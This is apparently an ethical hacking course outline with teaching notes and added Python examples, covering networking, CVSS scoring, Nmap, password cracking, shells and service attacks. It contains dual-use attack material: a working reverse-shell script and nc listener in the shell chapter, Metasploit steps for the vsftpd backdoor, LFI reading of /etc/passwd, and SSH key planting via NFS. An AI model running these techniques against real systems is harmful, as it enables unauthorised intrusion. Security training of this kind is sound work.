Ethical Hacking Course
Chapter 1: Introduction
Chapter 2: Network
Chapter 3: How The Web Works
Chapter 4: Install Kali Linux & Linux Command
Chapter 5: Exploit & CVE
Chapter 6: Information Gathering (Recon)
Chapter 7: Burp Suite
Chapter 8: Password Attack
Chapter 9: Shell
Chapter 10: Wireshark
Chapter 11: Network Service Attack
Chapter 12: OWASP Top 10
Chapter 13: Web Hacking
Chapter 14: Metasploit
Chapter 15: Active Directory
Chapter 16: Wi-Fi Hacking
Chapter 17: Capture The Flag (CTF)
Chapter 1
Introduction
Chapter 2
Network
IP Addresses:
Briefly, an IP address (Internet Protocol address) identifies a host on a network for a period of time. The address is not permanently tied to the hardware: when a lease expires or a device leaves the network, the same address can be handed to a different device, and the device can receive a different address later. The address itself does not change; only which host currently holds it.
An IPv4 address is a 32-bit number written as four octets, each in the range 0 to 255, separated by dots, for example 192.168.1.10. Part of the address identifies the network and the rest identifies the host on that network. Where that boundary lies is defined by the subnet mask (or the /prefix length), and dividing an address block into smaller networks this way is called subnetting.
What is important to understand here is that an IP address can move from device to device over time, but the same address cannot be in use by two devices at the same time on the same network.
Two devices on the same local network use their private IP addresses (for example from the 192.168.0.0/16 or 10.0.0.0/8 ranges) to communicate with each other. Any data either device sends to the Internet is instead seen with the same public IP address, because the router rewrites the source address on the way out (network address translation, NAT). Public IP addresses are assigned by your Internet Service Provider (ISP).
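The octet, subnet and private/public ideas above, as an added worked example that is not part of the course notes. It uses Python's standard ipaddress module; the addresses are made-up lab values, and it also shows the host counts for the /16 and /24 subnets that come up again in the Nmap chapter.

```python
"""Added example (not part of the course notes): IPv4 addressing and subnetting
with the standard ipaddress module. Addresses below are constructed lab values."""
import ipaddress

def describe(addr: str, prefix: int) -> dict:
    """Split an IPv4 address into octets and compute the facts of its subnet."""
    iface = ipaddress.ip_interface(f"{addr}/{prefix}")
    net = iface.network
    return {
        "octets": [int(o) for o in addr.split(".")],
        "network": str(net.network_address),      # the network part, host bits zeroed
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "usable_hosts": max(net.num_addresses - 2, 0),  # minus network and broadcast
        "private": iface.ip.is_private,           # RFC 1918, loopback, link-local ...
    }

def same_subnet(a: str, b: str, prefix: int) -> bool:
    """Two hosts talk directly (no router) only if their network parts are equal."""
    return (ipaddress.ip_interface(f"{a}/{prefix}").network
            == ipaddress.ip_interface(f"{b}/{prefix}").network)

if __name__ == "__main__":
    print(describe("192.168.1.10", 24))
    print(same_subnet("192.168.1.10", "192.168.1.200", 24))   # same /24
    print(same_subnet("192.168.1.10", "192.168.2.5", 24))     # different /24
    print(describe("8.8.8.8", 32)["private"])                  # a public address
```

A /16 has 65,536 addresses (65,534 usable) and a /24 has 256 (254 usable); the two reserved addresses are the network address and the broadcast address.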
MAC Address:
Every device on a network has a physical network interface, a chip on the motherboard or on an add-in card. The manufacturer assigns each interface a unique address at the factory, called a MAC (Media Access Control) address.
A MAC address is 48 bits long, written as twelve hexadecimal characters (hexadecimal is the base-sixteen numbering system used in computing) grouped in pairs and separated by colons, for example a4:c3:f0:85:ac:2d. The first six characters (the first three octets) identify the company that made the network interface and are known as the OUI (Organisationally Unique Identifier); the last six characters are a number unique to that interface.
The factory address is only a default: most operating systems let you set a different MAC address in software, so a MAC address on its own is not a reliable way to identify or authenticate a device.
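Parsing a MAC address into its two halves, as an added example that is not part of the course notes. The vendor table is a constructed stand-in for the IEEE OUI registry, and the example also reads the two flag bits of the first octet, which tell you whether the address was set in software rather than burned in.

```python
"""Added example (not part of the course notes): parse a MAC address, split the
OUI (vendor part) from the per-interface part, and read the two flag bits of the
first octet. The addresses and the small vendor table are constructed for the
demo; a real lookup uses the IEEE OUI registry."""
import re

MAC_RE = re.compile(r"^([0-9a-f]{2})([:-])([0-9a-f]{2})(?:\2[0-9a-f]{2}){4}$", re.I)

# Constructed lookup table, only for illustration, not real registry data.
OUI_TABLE = {"a4:c3:f0": "Example Vendor A", "00:0c:29": "Example Vendor B"}

def parse_mac(mac: str) -> dict:
    """Normalise to lowercase colon form and extract OUI, NIC part and flag bits."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    octets = [int(x, 16) for x in re.split(r"[:-]", mac)]
    norm = ":".join(f"{o:02x}" for o in octets)
    first = octets[0]
    return {
        "mac": norm,
        "oui": norm[:8],                      # first three octets: manufacturer
        "nic": norm[9:],                      # last three octets: per-interface
        "vendor": OUI_TABLE.get(norm[:8], "unknown"),
        # bit 0 of the first octet: 1 = multicast/broadcast, 0 = unicast
        "multicast": bool(first & 0x01),
        # bit 1 of the first octet: 1 = locally administered (set in software,
        # e.g. MAC randomisation or spoofing), 0 = burned in by the manufacturer
        "locally_administered": bool(first & 0x02),
    }

if __name__ == "__main__":
    print(parse_mac("A4-C3-F0-85-AC-2D"))
    print(parse_mac("02:00:00:00:00:01")["locally_administered"])  # software-set
```

When you see many locally administered addresses on a network (randomised MACs on phones, or a spoofed address), do not treat the OUI as telling you anything about the real hardware.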
Firewalls: A firewall is a device (or software on a host) within a network that decides which traffic is allowed to enter and leave. Think of a firewall as border security for a network. An administrator configures rules that permit or deny traffic based on numerous factors such as:
Where the traffic is coming from (has the firewall been told to accept or deny traffic from a specific address or network?)
Where the traffic is going to (has the firewall been told to accept or deny traffic destined for a specific address or network?)
What port the traffic is for (has the firewall been told to accept or deny traffic destined for port 80 only?)
What protocol the traffic is using (has the firewall been told to accept or deny traffic that is UDP, TCP or both?)
Rules are checked in order and the first matching rule wins, so the order of the rules matters as much as their content, and a safe policy ends with a default rule that denies anything not explicitly allowed.
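The rule factors above put together into a small stateless packet filter, as an added example that is not part of the course notes. The policy and the sample packets are constructed; the point it shows is first-match-wins evaluation, default deny, and how reordering two rules changes the decision.

```python
"""Added example (not part of the course notes): a tiny stateless packet filter
that evaluates rules the way most firewalls do: first matching rule wins, and
nothing matching means deny. Rules and packets are constructed for the demo."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Rule:
    action: str                  # "allow" or "deny"
    src: str = "0.0.0.0/0"       # source network, any by default
    dst: str = "0.0.0.0/0"       # destination network, any by default
    proto: str = "any"           # "tcp", "udp" or "any"
    dport: Optional[int] = None  # destination port, None = any port

def matches(rule: Rule, pkt: dict) -> bool:
    """A rule matches only if every one of its fields matches the packet."""
    return (ipaddress.ip_address(pkt["src"]) in ipaddress.ip_network(rule.src)
            and ipaddress.ip_address(pkt["dst"]) in ipaddress.ip_network(rule.dst)
            and rule.proto in ("any", pkt["proto"])
            and rule.dport in (None, pkt.get("dport")))

def decide(rules: List[Rule], pkt: dict) -> str:
    """First matching rule decides; no match at all means deny (default deny)."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"

# Constructed policy: a web server network 10.0.0.0/24 managed from 10.0.1.0/24.
POLICY = [
    Rule("deny", src="192.0.2.0/24"),                         # a blocked source network
    Rule("allow", dst="10.0.0.0/24", proto="tcp", dport=80),  # web from anywhere
    Rule("allow", dst="10.0.0.0/24", proto="tcp", dport=443),
    Rule("allow", src="10.0.1.0/24", dst="10.0.0.0/24", proto="tcp", dport=22),  # SSH only from admins
]

# Same rules, but the deny moved to the end: the blocked network can now reach port 80.
MISORDERED = POLICY[1:] + POLICY[:1]

if __name__ == "__main__":
    web = {"src": "203.0.113.5", "dst": "10.0.0.10", "proto": "tcp", "dport": 80}
    blocked = {"src": "192.0.2.9", "dst": "10.0.0.10", "proto": "tcp", "dport": 80}
    print(decide(POLICY, web), decide(POLICY, blocked), decide(MISORDERED, blocked))
```

The last line prints allow, deny, allow: with the deny rule moved below the port-80 allow, the blocked network gets through, which is the classic rule-ordering mistake.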
Network Services:
What is FTP?: File Transfer Protocol (FTP) is a protocol used to transfer files between hosts over a network. In its basic form it sends credentials and file contents in clear text.
What is NFS?: NFS stands for "Network File System" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files.
What is SMTP?: SMTP stands for "Simple Mail Transfer Protocol". It is the protocol used to send email, both from a mail client to its server and between mail servers.
Chapter 3
How The Web Works
What is DNS?
DNS (Domain Name System) provides a simple way for us to communicate with devices on the internet without remembering complex numbers. Much like every house has a unique address for sending mail directly to it, every computer on the internet has its own unique address to communicate with it, called an IP address. An IP address looks like the following: 104.26.10.229, four numbers ranging from 0 to 255 separated by periods. When you want to visit a website, it is not exactly convenient to remember this complicated set of numbers, and that is where DNS helps: instead of remembering 104.26.10.229, you can remember tryhackme.com instead.
DNS Record Types:
A Record
These records resolve a name to an IPv4 address, for example 104.26.10.229.
AAAA Record
These records resolve a name to an IPv6 address.
CNAME Record
These records resolve to another domain name. For example, the SulyCyberCon online shop has the subdomain name store.sulycybercon.com, which returns a CNAME record pointing to shops.shopify.com; the resolver then looks up that name to get the address.
MX Record
These records give the names of the servers that handle the email for the domain you are querying. For example, an MX record response for sulycybercon.com would look something like alt1.aspmx.l.google.com.
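How a resolver follows a CNAME to the final answer, as an added example that is not part of the course notes. The zone data is a constructed table built around the names used above (the addresses are from the documentation range), and the hop limit shows why resolvers refuse to chase CNAME loops forever.

```python
"""Added example (not part of the course notes): resolve a name against a
constructed zone table, following CNAME records to the final record the way a
resolver does, with a hop limit against loops. All zone data below is made up."""
ZONE = {
    "sulycybercon.com.":       [("A", "203.0.113.10"), ("MX", "10 alt1.aspmx.l.google.com.")],
    "store.sulycybercon.com.": [("CNAME", "shops.shopify.com.")],
    "shops.shopify.com.":      [("A", "203.0.113.50")],
    "loop1.example.com.":      [("CNAME", "loop2.example.com.")],   # deliberate loop
    "loop2.example.com.":      [("CNAME", "loop1.example.com.")],
}

def resolve_name(name: str, rtype: str = "A", max_hops: int = 8):
    """Return (answers, chain): records of type rtype and the CNAME hops followed."""
    name = name.rstrip(".") + "."           # normalise to a fully qualified name
    chain = []
    for _ in range(max_hops):
        rrs = ZONE.get(name, [])
        answers = [value for t, value in rrs if t == rtype]
        if answers:
            return answers, chain
        cnames = [value for t, value in rrs if t == "CNAME"]
        if not cnames:
            return [], chain                # no such name, or no data of that type
        chain.append((name, cnames[0]))     # alias: continue with the target name
        name = cnames[0]
    raise RuntimeError("CNAME chain too long (loop?)")

if __name__ == "__main__":
    print(resolve_name("store.sulycybercon.com"))       # follows one CNAME hop
    print(resolve_name("sulycybercon.com", "MX"))
```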
What is a URL? (Uniform Resource Locator)
GET Request
This is used for getting information from a web server.
POST Request
This is used for submitting data to the web server and potentially creating new records.
PUT Request
This is used for submitting data to a web server to update existing information.
DELETE Request
This is used for deleting information or records from a web server.
HTTP Status Codes:
Cookie: Cookies can be used for many purposes but are most commonly used for website authentication: after you log in, the server sets a cookie identifying your session and the browser sends it back with every later request, so whoever holds that cookie value is treated as you.
Chapter 4
Install Kali Linux & Linux Command
Chapter 5
Exploit & CVE
Exploit:
An exploit is a piece of software or a script that takes advantage of a vulnerability to let an attacker take control of a system; exploitation is the act of using it. Places to find public exploits:
1. SearchSploit
2. Exploit-DB
3. Metasploit
Introduction:
When you are submitting a vulnerability report to a company, it is very important to be able to communicate your findings in a clear and concise manner, so that the security or triage team receiving your report can reproduce it as quickly as possible. The metrics below are the CVSS v3 base metrics used to rate severity.
Attack Vector:
Describing the four scenarios: Network (a remote attack) when the exploit can be delivered over the Internet; Adjacent when the attacker has to be on the same local network (intranet) as the victim; Local when the issue lies at the level of operating system accounts, so the attacker has to run code on the host; and Physical when the attacker needs physical access to the victim's device.
Attack Complexity:
Does the attack require additional information about the target, such as unguessable IDs, a certain configuration or setting, valid credentials (e.g. for MFA issues), or some other condition outside the attacker's control, in order for the exploit to work? If so, complexity is High; otherwise it is Low.
Privileges Required:
If the vulnerable component sits inside an admin panel, we recommend setting the requirement to High. For a vulnerability that only needs an ordinary account (for example one where you must be invited to an organisation by an admin because self-registration is not possible), we recommend rating privileges as Low. None means no account is needed at all.
User Interaction:
Can the vulnerability be exploited solely at the will of the attacker, or must a separate user (or user-initiated process) participate in some manner, for example by clicking a link? The score is highest when no user interaction is required, since needing one adds a further step to exploitation.
Scope:
Does a successful attack impact a component other than the vulnerable component? If so, Scope is Changed, the score increases, and the Confidentiality, Integrity and Availability metrics should be scored relative to the impacted component.
Confidentiality:
The impact on the confidentiality of the information resources managed by the software due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to authorized users only, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity:
The impact on integrity from a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.
Availability:
The impact on the availability of the affected component resulting from a successfully exploited vulnerability. It refers to the loss of availability of the impacted component itself, such as a networked service (e.g. web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of an impacted component.
Examples
Stored XSS from an admin to a user:
Attack Vector: Network, as the attack can be done over the Internet
Attack Complexity: Low, as there are no particular premises needed for this attack to be successful
Privileges Required: High, because the attacker needs to be an admin in order for this vulnerability to be exploited
User Interaction: Required in case the user has to do some non-basic interaction with the website in order to trigger the payload (like clicking a link). None in case the victim only needs to visit the homepage or do very trivial interactions with the website
Scope: Changed, since the vulnerable component is the web server and the impacted component is the browser
Confidentiality: Low if access to the DOM is granted, None if there is no access to the DOM
Integrity: Low, as XSS can always cause defacement
Availability: None, because the application can still be used by the victims
IDOR with access to read and modify personally identifiable information (PII):
Attack Vector: Network, as the attack can be done over the Internet
Attack Complexity: High if the IDs are UUIDs or other high-entropy values. Low if they are sequential IDs
Privileges Required: Low, as the attacker needs to be logged in to perform the attack
User Interaction: None, as this is solely a server-side issue
Scope: Unchanged, as the impacted and the vulnerable component are the same, i.e. the web server
Confidentiality: High, because it gives access to PII
Integrity: High, because the attacker can delete/modify data
Availability: None, because the application can still be used by the victims
Full-response SSRF vs Blind SSRF:
Attack Vector: Network, as the attack can be done over the Internet
Attack Complexity: Low, since the attack is normally straightforward
Privileges Required: Low/High according to the level of privilege of the account linked to the vulnerable functionality
User Interaction: None, as this is solely a server-side issue
Scope: Unchanged in case of local port scanning, as the impacted component remains the web server. Changed if AWS credentials or local files can be exfiltrated, since the impacted component is then the cloud infrastructure
Confidentiality: Low/High depending on the type of information shown. None in case of Blind SSRF (no output)
Integrity: High in case AWS credentials are leaked, as that could lead to RCE. Low in case the attacker can only reach the intranet or the AWS metadata endpoint without obtaining credentials
Availability: None, because the application can still be used even if this has been fully exploited (this does not include some edge cases where SSRF can take down a service)
Chapter 6
Information Gathering (Recon)
1. Passive Reconnaissance:
Information you can gather from publicly available resources without directly engaging with the target, for example:
1. Whois
2. Shodan
3. GitHub
4. Wayback Machine
5. Google
2. Active Reconnaissance:
Active reconnaissance requires you to make some kind of contact with your target. This can be a direct connection to the target's systems (visiting the website, port scanning) or, in social engineering, a phone call or a visit to the target company under some pretext. It leaves traces in the target's logs, so it must only be done with authorisation.
Nmap:
Subnets with /16: this subnet can have around 65 thousand hosts (65,536 addresses, 65,534 of them usable).
Subnets with /24: this subnet can have around 250 hosts (256 addresses, 254 of them usable).
FIN Scan: The FIN scan sends a TCP packet with only the FIN flag set. A closed port replies with a RST, while an open port sends no response at all. As with the other stealth scans, Nmap cannot tell whether a silent port is open or whether a firewall is dropping the traffic to that port, so it reports such ports as open|filtered.
Targets can be given as a range: 10.11.12.15-20, as a subnet: 10.11.12.15/24, or as a list of hosts in a file:
nmap -iL list_of_hosts.txt
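Expanding those target specifications into the individual addresses a scan will touch, as an added example that is not part of the course notes. It follows Nmap's own behaviour for CIDR targets (a /24 is 256 addresses, including the network and broadcast addresses) and treats a list of lines the way -iL does; the targets are constructed lab values.

```python
"""Added example (not part of the course notes): expand Nmap-style target
specifications (single host, last-octet range, CIDR subnet, lines of an -iL file)
into individual IPv4 addresses, so you can see how many hosts a scan will touch
before you run it. Targets below are constructed lab values."""
import ipaddress
import re

RANGE_RE = re.compile(r"^(\d+\.\d+\.\d+\.)(\d+)-(\d+)$")

def expand_target(spec: str) -> list:
    """One spec -> list of dotted addresses; raises ValueError on garbage."""
    spec = spec.strip()
    if "/" in spec:
        # strict=False accepts a host address with a prefix, e.g. 10.11.12.15/24.
        # Like Nmap, include the network and broadcast addresses (256 for a /24).
        return [str(h) for h in ipaddress.ip_network(spec, strict=False)]
    m = RANGE_RE.match(spec)
    if m:
        prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad range: {spec}")
        return [f"{prefix}{i}" for i in range(lo, hi + 1)]
    ipaddress.ip_address(spec)          # validates a single address
    return [spec]

def expand_targets(lines) -> list:
    """Many specs (e.g. the lines of an -iL file), de-duplicated, order kept."""
    seen, out = set(), []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue                    # skip blanks and comments
        for host in expand_target(line):
            if host not in seen:
                seen.add(host)
                out.append(host)
    return out

if __name__ == "__main__":
    print(expand_target("10.11.12.15-20"))
    print(len(expand_target("10.11.12.15/24")), len(expand_target("10.11.0.0/16")))
```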
Service Detection:
Adding -sV to your Nmap command will collect and determine service and version information for the open ports. You can control the intensity with --version-intensity LEVEL, where LEVEL ranges between 0, the lightest, and 9, the most complete. -sV --version-light has an intensity of 2, while -sV --version-all has an intensity of 9.
OS Detection:
Adding -O to your Nmap command makes it guess the target's operating system from the way its TCP/IP stack responds to probes. The guess is most reliable when the target has at least one open and one closed TCP port.
Nmap Script Engine (NSE):
You can run the default script set with -sC, a whole script category with --script=vuln, or a single script with --script "http-csrf.nse", like this:
nmap -sC MACHINE_IP
nmap --script=vuln MACHINE_IP
nmap --script "http-csrf.nse" MACHINE_IP
Saving the Output:
The three main formats are:
1. Normal
2. Grepable
3. XML
Normal: -oN FILENAME, the same text you see on screen.
Grepable: -oG FILENAME, one line per host, named after the grep command it is designed to be processed with.
XML: -oX FILENAME, the format other tools (and Metasploit's db_import) read.
You can save the scan output in all three formats at once using -oA FILENAME.
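Pulling the open ports out of grepable output, as an added example that is not part of the course notes. The two Host: lines are constructed to match the -oG layout (port/state/protocol/owner/service/rpc/version, comma separated, tab before "Ignored State"); they are not a real scan.

```python
"""Added example (not part of the course notes): extract open ports from Nmap
grepable (-oG) output. The sample text is constructed to match the -oG layout."""
import re

SAMPLE_OG = (
    "# Nmap 7.94 scan initiated as: nmap -sV -oG scan.gnmap 10.11.12.0/24\n"
    "Host: 10.11.12.15 ()\tStatus: Up\n"
    "Host: 10.11.12.15 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, "
    "80/open/tcp//http//nginx 1.18.0/, 21/filtered/tcp//ftp///\tIgnored State: closed (997)\n"
    "Host: 10.11.12.20 ()\tPorts: 445/open/tcp//microsoft-ds//Samba smbd 4.6.2/\tIgnored State: closed (999)\n"
    "# Nmap done at ...\n"
)

# port/state/protocol/owner/service/rpc info/version/  (seven slash-separated fields)
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/[^/]*/([^/]*)/[^/]*/([^/]*)/")

def parse_gnmap(text: str) -> dict:
    """Return {host: [(port, proto, service, version), ...]} for open ports only."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                                   # comments and Status-only lines
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open":
                results.setdefault(host, []).append((int(port), proto, service, version.strip()))
    return results

def hosts_with_service(results: dict, service: str) -> list:
    """Which hosts expose a given service, e.g. everything running ssh."""
    return sorted(h for h, ports in results.items() if any(p[2] == service for p in ports))

if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_OG)
    for host, ports in found.items():
        print(host, ports)
    print(hosts_with_service(found, "ssh"))
```

The same per-host extraction is what you would feed into Hydra or a vulnerability lookup; filtered ports are dropped here because they give no service to attack.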
Script Categories:
SWITCH                EXAMPLE                                DESCRIPTION
-sV --version-light   nmap 192.168.1.1 -sV --version-light   Enable light mode (intensity 2). Lower chance of a correct match. Faster.
-sV --version-all     nmap 192.168.1.1 -sV --version-all     Enable intensity level 9. Higher chance of a correct match. Slower.
Chapter 7
Burp Suite
What is Burp Suite used for?
1. FoxyProxy
2. Setup Burp certificate
3. Dashboard
4. Target
5. Proxy
6. Intruder
7. Repeater
8. Decoder
9. Extensions
10. Burp Collaborator Client
Chapter 8
Password Attack
Offline Password Attack:
Tools:
1. John (John the Ripper)
2. Hashcat
3. hashid (identifies the hash type before you crack it)
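What John and Hashcat actually do with a wordlist, as an added example that is not part of the course notes. It guesses the hash type from its length the way hashid does, applies a couple of John-style mangling rules, and shows why an unsalted fast hash falls to a dictionary while an unknown salt stops the same attack. The MD5 and SHA-1 digests of "password" are well known; the other targets are constructed in the block.

```python
"""Added example (not part of the course notes): an offline dictionary attack in
the style of John/Hashcat, with a hashid-style type guess. Targets and wordlist
are constructed; the MD5/SHA-1 values are the well-known digests of "password"."""
import hashlib

# hashid-style guess from hex length. Ambiguous in real life: 32 hex chars could
# also be NTLM, 64 could be SHA3-256, so treat this as a hint, not a fact.
HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

def identify(digest: str):
    digest = digest.lower()
    if not all(c in "0123456789abcdef" for c in digest):
        return None
    return HASH_BY_LEN.get(len(digest))

def candidates(word: str, rules: bool):
    """A few John-style rules: as-is, capitalised, and each with a digit appended."""
    bases = [word, word.capitalize()] if rules else [word]
    out = list(bases)
    if rules:
        out += [b + str(d) for b in bases for d in range(10)]
    return out

def crack(target: str, wordlist, salt: str = "", rules: bool = True):
    """Hash each candidate (with the salt, if known) and compare to the target."""
    algo = identify(target)
    if algo is None:
        return None
    target = target.lower()
    for word in wordlist:
        for cand in candidates(word, rules):
            if hashlib.new(algo, (salt + cand).encode()).hexdigest() == target:
                return cand
    return None

WORDLIST = ["password", "letmein", "sunshine", "qwerty"]
MD5_PASSWORD = "5f4dcc3b5aa765d61d8327deb882cf99"            # md5("password")
SHA1_PASSWORD = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"    # sha1("password")
# Constructed targets: a mangled word, and the same word with a per-user salt.
SHA256_MANGLED = hashlib.sha256(b"Sunshine1").hexdigest()
SALT = "x9!"
SHA256_SALTED = hashlib.sha256((SALT + "sunshine").encode()).hexdigest()

if __name__ == "__main__":
    print(crack(MD5_PASSWORD, WORDLIST))                 # password
    print(crack(SHA256_MANGLED, WORDLIST))               # Sunshine1 (needs the rules)
    print(crack(SHA256_SALTED, WORDLIST))                # None: salt unknown
    print(crack(SHA256_SALTED, WORDLIST, salt=SALT))     # sunshine: salt known
```

Two things carry over to real tools: rules multiply the work per word (Hashcat's rule files do this at GPU speed), and a salt only slows an attacker who has the salt down by forcing one hash per user rather than one per wordlist; what really helps is a slow hash such as bcrypt.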
Online Password Attack:
Before starting a brute-force attack, try the product's default credentials first; only then start the attack. Online attacks are slow and noisy, and many services lock accounts after a few failures, so keep wordlists short and watch for lockouts.
Default Credentials:
1- https://default-password.info/
2- https://datarecovery.com/rd/default-passwords/
3- https://cirt.net/passwords?vendor=3COM
4-
crackstation.net is an online tool that looks hashes up in a large precomputed table; it only works for unsalted hashes of common passwords.
Tool:
Hydra: use Hydra to attack login services such as:
1- HTTP
2- HTTPS
3- FTP
4- SSH
5- SMTP
6- SMB
Chapter 9
Shell
WebShells:
When a web application lets us upload a file that the server will execute (for example a PHP file placed in a web-accessible directory), we can use that opportunity to upload code. In these cases we upload a webshell: a script that runs whatever command we send it in an HTTP request and returns the output.
Reverse Shell:
A reverse shell, also known as a remote shell or "connect-back shell", is a shell where the target machine opens the connection out to a listener on the attacker's machine, rather than the attacker connecting in. This is the opposite of a bind shell, which opens a listening port on the target. Reverse shells are preferred because firewalls block inbound connections far more often than outbound ones.
Listener: nc -lvnp <PORT>
We can use pentestmonkey's PHP reverse shell, or one of these resources:
1. PHP-Reverse-Shell
2. Reverse-shell-generator
3. PayloadsAllTheThings - Shell
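The connect-back mechanics described above, as an added example that is not part of the course notes. Both sides run in one process on 127.0.0.1: the "attacker" side plays the role of nc -lvnp, the "target" side connects out and runs what it is sent. The only command sent is a harmless echo and the port is chosen by the operating system.

```python
"""Added example (not part of the course notes): the two halves of a reverse
shell. The listener (attacker, the role nc -lvnp plays) waits for the connection;
the target connects out and executes each line it receives. Everything stays on
127.0.0.1 and the demo sends a single harmless command."""
import socket
import subprocess
import threading

def listener(ready: threading.Event, box: dict, command: str, timeout: float = 10):
    """Attacker side: accept the connect-back, send one command, collect output."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.settimeout(timeout)
    srv.bind(("127.0.0.1", 0))            # port 0: let the OS pick a free port
    srv.listen(1)
    box["port"] = srv.getsockname()[1]
    ready.set()                            # tell the "target" where to connect
    conn, _peer = srv.accept()
    with conn:
        conn.settimeout(timeout)
        conn.sendall(command.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)      # one command, then EOF so the target exits
        out = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            out += chunk
    srv.close()
    box["output"] = out.decode(errors="replace")

def connect_back(host: str, port: int, timeout: float = 10):
    """Target side: connect OUT to the attacker, run each received line as a command."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for line in s.makefile("rb"):      # ends when the listener closes its side
            cmd = line.decode().strip()
            if cmd:
                proc = subprocess.run(cmd, shell=True, capture_output=True)
                s.sendall(proc.stdout + proc.stder if False else proc.stdout + proc.stderr)

def demo(command: str = "echo hello") -> str:
    """Run listener and target together and return what the target sent back."""
    ready, box = threading.Event(), {}
    t = threading.Thread(target=listener, args=(ready, box, command), daemon=True)
    t.start()
    ready.wait(5)
    connect_back("127.0.0.1", box["port"])
    t.join(10)
    return box.get("output", "")

if __name__ == "__main__":
    print(demo())                          # prints hello
```

Note the direction of the TCP connection: the target is the client. That is why an egress rule that only allows the ports a server genuinely needs is the defence, and why a listener on 443 or 53 is the usual attacker choice.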
Chapter 10
Wireshark
Wireshark is a tool for creating and analysing PCAPs (network packet capture files) and is commonly regarded as one of the best packet analysis tools.
Filtering Operators:
Basic Filtering:
ip.addr == <IP Address>  (matches the address as either source or destination)
ip.src == <SRC IP> and ip.dst == <DST IP>  (one direction only)
tcp.port eq <Port #>  (matches either port), or a bare protocol name such as http
udp.port eq <Port #>  (matches either port), or a bare protocol name such as dns
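A small evaluator for the filter shapes listed above, run over constructed packet summaries, as an added example that is not part of the course notes. It exists to make one point concrete: ip.addr and tcp.port match either direction, ip.src and ip.dst match one, and "and" binds tighter than "or" as it does in Wireshark.

```python
"""Added example (not part of the course notes): evaluate Wireshark-style display
filters (field == value, field eq value, bare protocol names, and/or) over a few
constructed packet summaries. Not a real capture."""
import re

# Constructed packets, fields named as Wireshark names them.
PACKETS = [
    {"no": 1, "ip.src": "10.0.0.5", "ip.dst": "93.184.216.34", "tcp.srcport": 51234, "tcp.dstport": 80,
     "protocols": {"ip", "tcp", "http"}},
    {"no": 2, "ip.src": "93.184.216.34", "ip.dst": "10.0.0.5", "tcp.srcport": 80, "tcp.dstport": 51234,
     "protocols": {"ip", "tcp", "http"}},
    {"no": 3, "ip.src": "10.0.0.5", "ip.dst": "10.0.0.1", "udp.srcport": 40000, "udp.dstport": 53,
     "protocols": {"ip", "udp", "dns"}},
    {"no": 4, "ip.src": "10.0.0.9", "ip.dst": "10.0.0.5", "tcp.srcport": 44444, "tcp.dstport": 22,
     "protocols": {"ip", "tcp", "ssh"}},
]

# "either direction" fields map onto the two concrete fields they cover
COMPOUND = {"ip.addr": ("ip.src", "ip.dst"),
            "tcp.port": ("tcp.srcport", "tcp.dstport"),
            "udp.port": ("udp.srcport", "udp.dstport")}
TERM_RE = re.compile(r"^\s*([\w.]+)\s*(?:==|eq)\s*(\S+)\s*$")

def match_term(term: str, pkt: dict) -> bool:
    m = TERM_RE.match(term)
    if not m:                                  # bare protocol name, e.g. "http"
        return term.strip() in pkt["protocols"]
    field, value = m.group(1), m.group(2)
    return any(str(pkt.get(f)) == value for f in COMPOUND.get(field, (field,)))

def match_filter(expr: str, pkt: dict) -> bool:
    """'and' binds tighter than 'or', as in Wireshark. No parentheses supported."""
    return any(all(match_term(t, pkt) for t in re.split(r"\s+and\s+", clause))
               for clause in re.split(r"\s+or\s+", expr))

def apply_filter(expr: str, packets=PACKETS) -> list:
    """Packet numbers that the filter keeps, in capture order."""
    return [p["no"] for p in packets if match_filter(expr, p)]

if __name__ == "__main__":
    print(apply_filter("ip.addr == 10.0.0.5"))      # both directions: 1 2 3 4
    print(apply_filter("ip.src == 10.0.0.5"))       # one direction: 1 3
    print(apply_filter("tcp.port eq 80 or dns"))    # 1 2 3
```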
Frame (Layer 1) -- This will show you what frame / packet you are looking at, as well as details specific to the Physical layer of the OSI model.
Source [MAC] (Layer 2) -- This will show you the source and destination MAC addresses, from the Data Link layer of the OSI model.
Source [IP] (Layer 3) -- This will show you the source and destination IPv4 addresses, from the Network layer of the OSI model.
Protocol (Layer 4) -- This will show you details of the protocol used (UDP/TCP) along with source and destination ports, from the Transport layer of the OSI model.
Protocol Errors -- This is a continuation of the 4th layer, showing specific segments from TCP that needed to be reassembled.
Application Protocol (Layer 5) -- This will show details specific to the protocol being used, such as HTTP, FTP, SMB, etc., from the Application layer of the OSI model.
Application Data -- This is an extension of layer 5 that can show the application-specific data.
Chapter 11
Network Service Attack
FTP (File Transfer Protocol):
Enumeration FTP:
Exploit FTP:
1. msfconsole
2. search exploit vsftpd 2.3.4
3. use exploit/unix/ftp/vsftpd_234_backdoor
4. options
5. set RHOSTS 192.168.116.132
6. exploit
This site is vulnerable to LFI, so we can read /etc/passwd and see the usernames on the box.
Exploit SSH:
Network File System (NFS):
Enumeration NFS:
Exploit NFS:
Create an SSH key pair and place the public key in .ssh/authorized_keys inside the home directory that the NFS share exposes, then log in over SSH with the private key.
